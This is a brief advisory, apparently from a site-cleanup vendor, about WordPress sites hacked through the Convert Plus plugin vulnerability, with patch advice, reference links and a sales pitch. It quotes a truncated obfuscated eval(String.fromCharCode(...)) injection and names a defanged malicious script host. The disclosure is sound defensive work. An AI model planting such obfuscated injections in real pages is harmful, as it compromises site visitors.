Last updated: June 05 2019
We recently cleaned several sites affected by the recent convertplug plugin vulnerability. In most cases plugin is bundled with Avada theme. All Convert Plus versions up to 3.4.2 are vulnerable to attacks.
Users should update to version 3.4.3 ASAP, as this is a critical security issue.
That’s why we recommend a thorough analysis, followed by a malware cleanup.
Malicious code found so far, directing users to:
eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59
During the cleanup process, we found malicious backdoor files located in wp-content/uploads folder. So be aware that attackers will try to regain site access.
All index.php files were corrupted as well, injected with malicious JS scripts hosted on css.developmyredflag[.]top.
To sort this contamination, you can purchase any of our plans or you can try to fix it yourself.
Make sure you’ll perform a backup before making any changes.
wpvulndb.com ConvertPlus <= 3.4.2: https://wpvulndb.com/vulnerabilities/9325
Wordfence report: https://www.wordfence.com/blog/2019/05/critical-vulnerability-patched-in-popular-convert-plus-plugin/
Magefix cleanup plans: https://www.magefix.com/pricing